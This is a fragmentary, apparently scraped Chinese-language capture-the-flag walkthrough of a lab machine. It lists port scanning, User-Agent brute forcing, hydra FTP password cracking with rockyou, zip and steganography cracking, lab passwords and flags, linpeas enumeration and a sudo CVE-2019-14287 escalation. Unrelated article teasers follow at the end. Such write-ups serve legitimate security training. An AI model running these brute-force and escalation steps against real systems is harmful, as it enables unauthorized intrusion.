nmap -A 10.10.119.64
Codename
(机密代号)Agent R
A
到 Z
curl
Copy as cURL
curl 'http://10.10.119.64/' -H 'User-Agent: meow' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0, no-cache' -H 'Pragma: no-cache'
import requests
for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
headers = {
'User-Agent': i ,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0, no-cache',
'Pragma': 'no-cache',
}
response = requests.get('http://10.10.119.64/', headers=headers).text
print(i,len(response))
218
C
就猜到ㄌUser-Agent:C
发 request
User-Agent
为 C 并送出chris
hydra -l chris -P /opt/rockyou.txt ftp://10.10.119.64
chris
crystal
ftp 10.10.119.64
ls
观察 ftp 里面的档案
get 档名
把档案依序载下来cat To_agentJ.txt
strings cutie.png
foremost cutie.png
unzip
7z x 00000067.zip
zip2john 00000067.zip > j.txt
john j.txt --wordlist=/opt/rockyou.txt
alien
7z x 00000067.zip
alien
即可解压完毕QXJlYTUx
base64 -d <<< QXJlYTUx
Area51
cute-alien.jpg
steghide
进行解密steghide extract -sf cute-alien.jpg
Area51
message.txt
james
hackerrules!
user_flag.txt
b03d975e8c92a7c04146cfa7a5a313c7
sudo -l
/bin/bash
Roswell alien autopsy
scp linpeas.sh [email protected]:/tmp
bash linpeas.sh | tee meow.txt
Sudo 1.8.21p2
CVE-2019-14287
james
b53a02f55b57d4439e3341834d70c062
DesKel
aka Agent R
这个得上一篇:https://ithelp.ithome.com.tw/articles/10261...
写在前面 placeholder for d10 placeholder for d10 place...
最後终於来到了我们最後一个章节:『 Transforms 』。 Transform 在 slate...
好的让我们开始吧! 检视页面 首先我们先检视一次整个页面,可以发现一些显而易见的问题,比如说颜色众多...
平台就是你的资本和机会,在这数位时代,你不定义自己,别人会自动为你贴标签。 这是来自数位形象力这本书...